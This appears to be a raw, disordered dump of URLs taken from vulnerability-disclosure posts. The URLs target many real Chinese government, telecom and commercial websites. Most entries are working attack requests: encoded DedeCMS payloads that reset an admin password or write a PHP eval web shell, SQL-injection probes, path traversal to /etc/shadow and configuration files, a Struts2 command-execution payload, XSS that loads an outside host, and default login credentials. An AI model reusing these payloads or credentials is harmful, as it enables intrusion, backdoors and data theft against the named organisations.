d.youc.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35 d.youc.com/dede/ http://intra.ccidnet.com/jeeadmin/jeecms/login.do?returnUrl=/jeeadmin/jeecms/index.do http://blog.china.com/jsp/main/channel/lastUpdateBlog.html www.china.com这个网站是国际范儿的,随时可能被国外hack盯上 http://www.189.net.cn/189.rar http://www.xhgjyc.com/show.asp?id=374 http://tenxing.ax.lt/ http://www.shopex.cn,闲来无事友情检测下,是个Dedecms,本以为管理员安全会做的很好,哎,直接秒爆管理账户密码,汗,做到此就不继续了,只做安全检测,若被不法分子利用漏洞,拿下服务器搞破坏不在话下,希望管理员能意识到网站的安全性,谢谢! http://server.zzidc.com http://www.gdfc.org.cn http://www.hljlsj.gov.cn/fileup.aspx http://210.51.19.97/test/ http://210.51.19.97/test/soft/中ymy.ftp ftp://bj.video.chinanews.com http://bj.video.chinanews.com:8090/ ftp://hkftp.phoenixtv.com http://www.fsgjj.gov.cn/article.do?id=8a8a8a813bd5977b013bd662017f28e0 http://60.217.44.4/login.jsp http://vote.runsky.com/2012/05/pijiu/index.php?app=baby&act=babybm http://www.lydrc.gov.cn/ http://www.lydrc.gov.cn:8008/key/index.shtml http://58.19.117.116/ http://wap.91160.com/index.php?c=account&a=orderinfo&yuyueid=101361855 http://product.yesky.com/front/productprice/productprice.do?productid=205502 http://events.youku.com/chery_riich/ http://dd.jm.e21.cn/web/content.php?id=25224 http://e-learning.cnpc.com.cn/jsp/sys/printProp.jsp http://e-learning.cnpc.com.cn/jsp/sys/prop.jsp http://e-learning.cnpc.com.cn/resource/ http://e-learning.cnpc.com.cn/jsp/index3.jsp http://e-learning.cnpc.com.cn/jsp/index2.jsp http://loto.sina.cn/index!simple.do?agentId=14759&vt=4 http://fota.suning.com Admin:Administrator http://ewp.suning.com.cn/app/plugins/download.jsp http://oa.suning.com.cn http://222.44.63.253/login.action http://www.szcert.org:8080/ http://www.szcert.org:8080/acnps/ http://www.szcert.org:8080/szcert/ http://www.szcert.org:8080/szcert/SZCERT/newsContent.jsp?newsId=2428&categoryId=8 http://www.szcert.org:8080/acnps/newsContent.jsp?newsId=696&categoryId=13 http://zfcg.nen.com.cn/houtaiguanlixitong/managerlist.jsp http://lngp.nen.com.cn/ http://shenbao.sc-n-tax.gov.cn/jsp/system_info/info_xx.jsp?CZWDBH=20121001999999999000000001 http://shai.goodbaby.com/tuku/?category=2 http://shai.goodbaby.com/tuku/?category=2 http://124.42.127.141:8080/questionnaire/index.php?questionnaireId=2没过滤导致,现如今这个修复了。可是,后面的呢? http://124.42.127.141:8080/questionnaire/qi.php?questionnaireId=1&uId=8dfc7ab4-279d-1031-8b89-001cc4d76f24 http://decoclub.ellechina.com union.xiu.com/sina/redirect.action http://zj.12530.com/wap/ring/ringInfo.action?ringIndex=5757973 http://zj.12530.com/wap/ring/ringInfo.action?ringIndex=5757973 http://www.hnssl.com/test_physics/login.asp http://www.hnssl.com http://ir.anta.com/tc/home.php?option=4&Itemid=160565 site:img1.house365.com filetype:txt skyclass.net/newsview.php?nid=203 http://121.28.141.36:8080/ www.aucma.cn/index.php?act=showgoods&i=88 http://deals.sina.com/exec/fwd.php?id=1 http://drops.wooyun.org/papers/59 http://www.comexe.cn/ns.php?sid=25 http://dns0755.net/help_list.php?ids=1009'%E2%80%98&con=index&mes_title=%BF%EC%CB%D9%B0%EF%D6%FA http://expert.ccidnet.com/expert/public.php?eid=1535 http://zk.czedu.gov.cn/datashow.asp?ID=655 http://www.cppc.gov.cn/news_play.asp?id=845 http://www.hi.jcy.gov.cn/view_rdjj.php?xuh=8706 http://crm.metalchina.com/ http://scuda.sina.com.cn/unilogin/.svn/text-base/INSTALL.txt.svn-base http://scuda.sina.com.cn/unilogin/backup/ http://scuda.sina.com.cn/unilogin/.svn/列目录 http://nsr.sina.com.cn/robots.txt/x.php http://www.bjxgt.gov.cn/i/?u=Qy-3-28-437?hd.vip.yy.com http://www.jhwater.cn/web/net/water_cost_index.asp?icYhId=106203 http://www.dzswj.com/readnews.asp?id=125 http://www.dzswj.com/readnews.asp?id=217 http://www.dzswj.com/type.asp?id=13 http://www.dzswj.com/admin/uploadfile.asp?currentFolder=/upfiles/../ http://www.yunhosting.net/UserFiles/ http://www.yunhosting.net/UserFiles/e.asp;.jpg http://www.mrsta.com/%E9%83%A8%E7%BD%B2.txt http://www.mrsta.com/user/index.asp http://www.xjxfdh.com/readnews.asp?id=46 http://www.xjxfdh.com/readnews.asp?id=37 http://www.xjxfdh.com/type.asp?id=4 http://try.aili.com/usercenter/otherjour/1015756.html?page=2111111111111111111111111 http://comment.aili.com/index.php?m=comments&content=rtytf111111111111ryr&anonymity=0&uname=admin&uid=1037158&oid=1079&sid=5&title=dfffffffffffffffff&jsonpcallback=jsonp1371457995977 http://www.oppobd.com/product-user-info.php http://www.cyjoycity.com/joy.php?id=4 http://222.85.126.230:8080/ekbs/ask/systemManageIndex.action?method=toSystemManageIndex http://upload.ccidnet.com/cases/admin/login.jsp http://goldpen.ccidnet.com/goldpen/admin/ http://info.womai.com http://t.hk.qq.com/ http://t.hk.qq.com/index.php/index/friend/follow/type/1/name/wooyun2 www.fjty.gov.cn/front/fwdtLawguide/list.do?searchType=1&searchbusiness=0 http://www.winenice.com/account/user_showUserInfo.shtml http://zone.wooyun.org/content/4261 http://www.93.gov.cn/ http://my.mbaobao.com/member/address/modify http://m.mbaobao.com/user/message/messageList.html?pageType=1 http://10010.ruyi.com/sdltq3/front/FrontPortalAction!index.action http://fw.zjfda.gov.cn/ http://elearning.teacher.com.cn/jmx-console/ http://jifen.24365pt.com/fck.jsp http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://www.wooyun.org http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://admin.soso.com http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://10.130.74.19 http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://w@w:10.130.74.19 http://mch.tenpay.com/?verify_code=1 http://221.179.9.21/bpss/gzsi/phone/.svn/text-base/login.jsp.svn-base http://product.eladies.sina.com.cn/probation.php?id=3938 http://product.eladies.sina.com.cn/interface/probation.php?_a=get_product_probation_list&product_id=3938&limit=10&callback=getProbationAssignList&rnd=993568&page=2 http://b2c.csair.com/B2C40/data/order/importPNR/getPnrRules.xsql?typeid=1 http://drops.wooyun.org/papers/64 http://www.91ri.org/3016.html http://shadu.baidu.com/statics/.svn/entries http://www.jiankongbao.com/feedback_reply.php?feedback_id= http://211.139.140.43/cutesoft_client/cuteeditor/load.ashx?type=image&file=../../../web.config http://ipv6te.bnu.edu.cn/index.action http://www.e-xxcs.cn/ http://ccidstudy.ccidnet.com/ http://qc.homeinns.com/Login.aspx http://tieba.baidu.com/p/2401973084 http://tieba.baidu.com/p/2395449386#J http://tieba.baidu.com/p/2369003726#b site:sto.cn http://tuya.games.sina.com.cn/graffito_detail.php?wid=37519 http://tuya.games.sina.com.cn/graffito.php?tid=36&author=5352 http://121.14.4.245:81/ http://121.14.4.245:81/upload.do?method=uploadDcp&domainStr={域名}&pwd={与域名有关系的密码}&rad=0.13187121579596306 http://wap.sogou.com/tc?url=http%3A%2F%2Fno.sohu.com%2F http://www.supor.com.cn/knowledgeread.php?infoID=366 http://www.supor.com.cn/admin/Default.htm http://stmp.moe.edu.cn/user!login.do site:www.hebeieol.com inurl:php http://aqbzh.chinasafety.gov.cn/sps/loginaction!login.action http://www.nm-n-tax.gov.cn/interview/interview!main.action?COLLCC=3197299591&siteroot=nmgsj http://www.dingxing.gov.cn/index.action http://wap.sm.gov.cn/news/mayor-mail.action?columnNum=1447&page.pageNo=6 http://www.qinghu.gov.cn/email.action;jsessionid=85D95C6FB39405837C5982CBD2986989 http://www.sjzysgx.gov.cn/about/about!office.do http://www.renren.com/{myID}#//status/status?id={yourID http://t.hk.qq.com/index.php/index/t/del/tid/1234567890 index.php/index/t/add http://t.hk.qq.com http://t.hk.qq.com/index.php/u/littlebirb http://t.hk.qq.com/index.php/index/t/add?type=2&content=aaa&reid=1234567890&format=html http://www.zs.zhaozhou.gov.cn//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://http://www.zs.zhaozhou.gov.cn/plus/mytag_js.php?aid=9013 http://www.zs.zhaozhou.gov.cn/plus/90sec.php http://www.golf008.com/admin.php,后台mysql,loadfile什么的地址都好找,不演示了,就贴个图就都明白了。 http://www.youximenhu.com/index.php?m=Center&a=message http://ccidthinktank.net/plus/view.php?aid=3359&tyid=144 http://www.ccidthinktank.com/plus/view.php?aid=3359&tyid=144 http://ccidthinktank.net/plus/list.php?tid=42&id=41 http://www.ccidcall.com.cn/news_read.asp?id=120 http://expert.ccidnet.com/expert/list.php?tid=38761 http://member.echinatobacco.com/docs/funcspecs/下有几个比较邪恶的文件,我猜是被入侵了。 http://stock1.sina.cn/dpool/stock_new/v2/live_q_add.php?spec_type=forex&vt=4&wm=1223 http://stock1.sina.cn/dpool/stock_new/v2/live_q_list.php?spec_type=forex&vt=4&wm=1223 http://wo.10010sh.cn/emp/woLoginAction_checkUserName.action www.ccidnet.com xxx.com/xxx/的类型。。。求改进 http://123.233.245.154:8080/pims/ ftp://121.199.12.185 http://re.meizu.com/Default.aspx?barCode=%22%3E'%3E http://app.meizu.com/search/0?key=%22%3E'%3E%3Ciframe/src=//tmxk.org%3E http://developer.meizu.com/faq/faq_toquiz.jsp?keyWord=%3E'%3E%3Cembed%3E http://app.meizu.com/906003 http://developer.meizu.com/faq/faq_content.jsp?questionId=408001 http://developer.meizu.com/faq/faq_personquiz.jsp http://view.sina.cn/h5/article.php?section_id=218&id=37582 http://127.0.0.1/price.asp?anid=63 http://down.chinaz.com/soft/30676.htm http://mo.amap.com/?q=31.234527,121.287689&name=park&dev=0 http://api.amap.com/URI/browser_guide) http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x05.txt http://mbsky.com/ http://www.52fangwu.com)。 http://admin.xdf.cn/admin/存在dede的getshell漏洞,成功拿到shell http://www.nongmintv.com/v/digg.php?con=1&id=1 http://www.now.cn/domain-admin/domainManage.net?IDDomain=域名id http://www.now.cn/pay/renew.net?idGUser=n+域名id http://pay.youku.com/inpour/index.html?method=tenpay http://oa.cashchina.cn:8080/web-console/ http://dmp.www.net.cn/order/operaterecords/S201303271308824 http://act.52pk.com/spe/search/link.php?id=59 IP:115.182.53.65 Server:nginx Powered-by:PHP/5.2.14 Server:MySQL http://admin.eguan.cn/pl_all.php http://admin.eguan.cn/pl_del.php?pid=此处为评论ID,可遍历 http://www.kchance.com/nvision_details.asp?id=1859 homepage.php/[用户名]/member-profile http://php168.cn/com/homepage.php/admin/member-profile http://zc.yundasys.com/ts/user/user_ts_detail.php?tsid=306623 https://www.dnspod.cn/tools#/west263.com http://iphone.10010.com/WEB-INF/web.xml http://iphone.10010.com//WEB-INF/classes/jdbc.properties http://iphone.10010.com//WEB-INF/spring-cfg/applicationContext.xml http://buzz.youku.com/.svn/entries http://buzz.youku.com/newsletter_new_6_6.sql http://show.aili.com/index.php?m=cont_create&index&a=del_pic&pic_path=.%2Fuploadfile%2F2013%2F619%2F1234567890.jpg http://show.aili.com/index.php?m=cont_create&index&a=del_pic&pic_path=.%2Findex.php http://app.gd.sohu.com/minisite/yida/20090801/index_list_json.php?pagenumber=1 http://app.gd.sohu.com/minisite/yida/20090801/index_list_json.php?pagenumber=10000000 http://180.153.132.52/invoker/JMXInvokerServlet http://180.153.132.75/invoker/JMXInvokerServlet http://180.153.132.81/invoker/JMXInvokerServlet http://www.metasploit.com/modules/exploit/multi/http/jboss_invoke_deploy http://gmail.sina.net/main/control/agents.php http://agent.hc360.com/test.aspx?name=1 http://wooyun.org/bugs/wooyun-2013-026152,有人回复对爱丽网进行了注射 http://member.aili.com/p/xxoo13 http://zzzs.hhyedu.com.cn/admin http://2010.tudou.com/nba/ajax.php http://zzjyt.haier.net/btb_xls/ http://tj.xywy.com/tjcx/admin/index.php http://www.3news.cn/plus/90sec.php http://service.cellcom.com.cn/)的软件开发商开发的业务管理系统。其中有一个已经被爆了,详细内容请移步 http://survey.sohu.com/config.inc.php.bak http://xxx.com/front/memberfront/memberFront_vipLogin.do http://huodong.56.com/huati/79?do=videoList&p=81 http://61.132.94.6/ioa/book/ http://qiantu.xdf.cn/webrms/Question/Answer3.jsp?QuestionSort=0 http://product.aili.com/cosmetics/show/annasuFn/7533.html来演示 http://www.mafengwo.cn/u/19222798.html http://www.5rao.com/ http://xinshuitang.com/NewFile.txt http://www.sdcncsi.com.cn/content.jsp?col=002&artid=138 http://xb.hebtu.edu.cn/news_browse.asp?id=123 http://xb.hebtu.edu.cn/admin/login.htm http://202.206.108.10/admin.php?mod=phpcms&file=login http://www.rsdtxsf.com/news_view.php?cid=2&nid=146 http://www.shxstm.org.cn http://www.kjg.so http://10010.bbn.com.cn/index.php?s=/CliUser/bindphone/userid/201206072104100933 http://127.0.0.1:5656/shopex/api.php inurl:ConsolidatedLogin/html/loginInput.action inurl:loginInput.action http://area.autodesk.com/存在漏洞的链接为 http://area.autodesk.com/ConsolidatedLogin/html/loginInput.action https://ssso.autodesk.com/存在漏洞的链接为 https://ssso.autodesk.com/ConsolidatedLogin/html/loginInput.action http://tuchong.com/342390/ http://item.taobao.com/item.htm?spm=a1z10.3.w4002-2413729824.9.4V5gj0&id=25924204490 http://tbobn.net/aixinj/101914975.js http://vdisk.weibo.com/s/GEtOM http://localhost/test/ecshop/flow.php?step=add_to_cart http://bm.bjmzdx.org:8080/reg.action http://www.tongbu.com/api/tracker.aspx?lurl=http://qd.leaderhero.com/qd/tui/tbtui_v2.10.ipa&site=open_ipa.html&title=%u935a%u5c7e%ue11e%u93ba%3f&type=soft&_r=1371710065758 http://s.tongbu.com/s?deviceid=1&clienttype=2&key=l http://bbs.tongbu.com/forum.php http://bbs.tongbu.com/forum-26-1.html http://www.hedalu.gov.cn/list!detail.action?nav0.id=79&nav1.id=81&info.id=605 http://www.51upnet.com/list.asp http://www.tc56.com:8080 admin:123456 http://topic.xywy.com//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://www.90sec.org/plus/mytag_js.php?aid=9013 http://www.90sec.org/plus/90sec.php http://topic.xywy.com//plus/conn.php http://maillist.snda.com/ http://alis.annto.com.cn:83/alis3/login.action http://alis.annto.com.cn:81/alis3/login.action http://sbc.nbu.edu.cn/article/file/cid/4710/?file=../../../../application/config/config.ini.php&method=out http://ads.admin5.com/ ads.admin5.com/plus/90sec.php http://www.mafengwo.cn/event/event.php?iid=1307939 www.gzds.gov.cn http://www.gzds.gov.cn/search/infoviewsearch.jsp?randomserial=1 http://localhost/mobile/user.php?act=register http://it.sto.cn:8080/lxb/zgslxb.php http://it.sto.cn:8080/lxb/zzb_select.php http://it.sto.cn:8080/lxb/pq_select.php http://it.sto.cn:8080/lxb/xbm.php?dbm=高管 http://60.31.214.34/display.action http://hy.shenzhenpost.com.cn/shop/member!passwordRecover.action http://vip.abcc-club.com/shop/member!passwordRecover.action http://zhidao.www.dianping.com/robots.txt/a.php http://others.sports.sina.com.cn/cva/paper.php?id=264 url:http://data.auto.sina.com.cn/complaint2012/getdetail.php?id=13718135161609 http://data.auto.sina.com.cn/complaint2012/getdetail.php?id=13718135161609 http://data.auto.sina.com.cn/complaint2012/getdetail.php?id=13718135161609 http://data.auto.sina.com.cn/complaint2012/getdetail.php?id=13718135161609%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- http://data.auto.sina.com.cn/complaint2012/getcomplaints.php http://member.aili.com/p/?a=lists&c=member&cateid=721&m=room&username=123 http://m.3g.qq.com/account.html?uid=xxx1&fr=2&aid=xx http://m.3g.qq.com/cgi-bin/general.cgi?uid=#{uid}&sid=&fr=2&ft=0&aid=#{aid}&cgi=follow&stid=#{stid http://www.mwines.com.cn/shop/member!passwordRecover.action http://recommend.womai.com:1107/recommender/ http://recommend.womai.com:1107/recommender/recommend http://pic2.womai.com/.bash_history http://it.sto.cn:8080/lxb/update.php?id=13 http://oa.sto.cn/e3oa/index.asp http://60.191.59.12:8000/page/gps/LoginGPS.aspx?NextLink=main%2fmonitor.aspx http://222.66.109.136:8088/hr/zzbyuangong_all.action http://cos.sto.cn/wui/main.jsp?templateId=1# http://it.sto.cn:8080/lxb/admin/pq_select.php http://211.160.168.229 http://zhidao.www.dianping.com/uc_client/install/?language=simplified_chinese_utf8 http://zhidao.www.dianping.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://uc.m.sohu.com/uc/v3/profile/auto http://uc.m.sohu.com/ http://uc.m.sohu.com/uc/v2/homepage http://uc.m.sohu.com/uc/v3/profile/auto http://uc.m.sohu.com/uc/v2/homepage http://oa.sto.cn/e3oa/vote/vote.mdb http://211.160.170.77 http://active.zol.com.cn/08active/514cn/top_list.php?type=1 http://it365.yesky.com/cseek.productList.do?userid=295484&qq-pf-to=pcqq.c2c site:suning.com inurl:login http://sop.suning.com/scs/NewSCSHomePage.jsp?login=Bdl8BJlQcA9UNnPxZ5Iu1NdBX36Awia7SzNsl0XkxlAj8gbDH6jvZt6d+QQXQZJe http://b2bkm.suning.cn:9080/跳转到了http://b2bkm.suning.cn:9080/restrictedHomePage/index.jsp http://即可绕过认证直接访问 http://b2bkm.suning.cn:9080/eWebEditor/admin/login.jsp看到后台界面 http://b2bkm.suning.cn:9080/eWebEditor/admin/upload.jsp?id=26&d_viewmode=list&dir=../发现有个filemanager http://221.204.249.172:8081/ywadmin/login.aspx http://www.hea.gov.cn/manage/content/docmanage/previewImg1.jsp?filePath=/../..//../..//../..//../..//../..//etc/shadow%00.jpg http://www.hea.gov.cn/manage/content/docmanage/download.jsp?filePath=/../..//../..//../..//../..//../..//etc/shadow http://www.hea.gov.cn/manage/index/login.jsp http://www.1737game.com/api/banner.php?category=5 http://www.189mv.cn/movie/huodongDetails2.action?cityid=440100&id=5600?cmpid=push-ad-yxt,将第二个?改成&后就能正常显示不报错。 http://us.weibo.com/api/create_friend http://113.240.255.146:802/comp_employerbookinfo.aspx http://q.fund.sohu.com/fund/saveVoteInfo.do http://jiameng.fuanna.com/dianping/default.aspx http://bq.sto.cn/Login.aspx http://it.sto.cn:8080/lxb/xbm.php?dbm='%20or%20''= http://211.139.251.13/console/system/jsp/login.jsp http://bjic.baoji.gov.cn/cluster/webSite/tradeDetail.action?id=68 http://eyun.sh.189.cn/注册账号 http://eyun.sh.189.cn/user/disk-up-space.jsp URL:http://wap.hoolai.com/platform/login_hoolai.action http://bj.esf.sina.com.cn http://bh.580.gov.cn/admin/ http://bh.580.gov.cn/admin/ http://jh.580.gov.cn/admin/ http://phy.cnu.edu.cn/news.php?id=262 http://wap.sina.com.cn/cms/singer.php?from=874&mediaType=2&name=%C0%EE%CF%FE%BD%DC&pid=3075&pl=down&pt=demo&pv=1&sid=900446&singerId=-1%20or%2013%3d11&tid=96905&UA=Opera&U_RID=132355204 http://decoclub.ellechina.com/calendar_cont.php?calid=99999999%20union%20select%201,%20database%28%29,version%28%29,4,5,6,7,8,9,user%28%29,11,12 http://union.winenice.com/Member/MemberBasicInfo.aspx http://union.winenice.com/Help/RetrievePwd_Step2.aspx http://www.hca.gov.cn/ http://iask.sina.com.cn/b/21253199.html?sudaref=www.soso.com&retcode=0 http://iask.sina.com.cn/b/21171279.html?from=relatedn http://www.3g.cn/recruit/jobs/list/page/1?cid= http://expert.ccidnet.com/ http://expert.ccidnet.com/plus/view.php?aid=781 http://yzb.cppsu.edu.cn/more.asp?id=639 http://tmxk.org/thread-496-1-1.html。 tmxk.org/.js http://y.duowan.com/channel2/52399485/index http://y.duowan.com/channel2/getDetail?channelId=52399485&bbsZoneId=wEkJNgE-SR4&topicId=wEqk-d1-Pi7 http://y.duowan.com/channel2/getDetail?channelId=52399485&bbsZoneId=wEqixf--ONF&topicId=wEqiyVZ-OOB URL:http://mail.agent.dns.com.cn http://mgt.dns.com.cn/main/public_doc.php?doc=sendpasswd可以把密码直接发到域名管理的邮箱里 http://kjjr.bankcomm.com/dfv/web/findBykeyword.JSP http://client.cmge.com/admin/Login2.action?class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23k8team%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23k8team.println%28%23d%29%2c%23k8team.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29 http://shop104867991.taobao.com/ www.taotantan.com/trans2/share/share-show?sellerNick=ilikezl&width=950&url= http://ftpitwhc.3.chinazhost.com/to.php http://s.click.taobao.com/t_js?tu=http%3A%2F%2Fs.click.taobao.com%2Ft%3Fe%3DzGU34CA7K%252BPkqB05%252Bm7rfGGjlY60oHcc7bkKOQiRddrNEyGLx31dnc6%252Fz%252BaQS2UNDUWpebTcEEjBuk1W5odmLS8%253D%26pid%3Dmm_40208125_0_0%26ref%3Dhttp%253A%252F%252Fwww.huaxiayes.com%252Fishows.html%26et%3DjFBDOb%252FIN4eE6A%253D%253D www.taotantan.com/trans2/share/share-show?sellerNick=ilikezl&width=950&url= http://www.realtimedsp.com.cn/safe.asp http://www.sugon.com/about/newsselect?title=%'%20and%201=1-- http://www.sugon.com/about/newsselect?title=%'%20and%201=2-- http://www.sugon.com/about/newsselect?title=%%27%20%20ORDER%20BY%204-- http://www.sugon.com/about/newsselect?title=%%27%20%20ORDER%20BY%205-- http://218.200.3.22/app/ http://218.200.3.22/common/ url:http://www.xakh.gov.cn/ http://m.winenice.com/Product/Add_Car.aspx?ProductCode=ag000027&ProductName=%e5%93%a5%e7%bd%97%e9%87%8c%e5%a5%a5%e7%9a%87%e5%86%a0%e9%be%99%e8%88%8c%e5%85%b0%e9%85%92&Price=899.0 http://m.winenice.com/MyWineNice/MyOrderRePort/520130623000001.html http://m.winenice.com/MyWineNice/MyOrderRePort/520130622000001.html http://www.bankofyk.com http://www.winenice.com/json/cj_list.shtml?activeID=1&m=0.7585369871730625&n=20 http://admin.neotv.cn/ 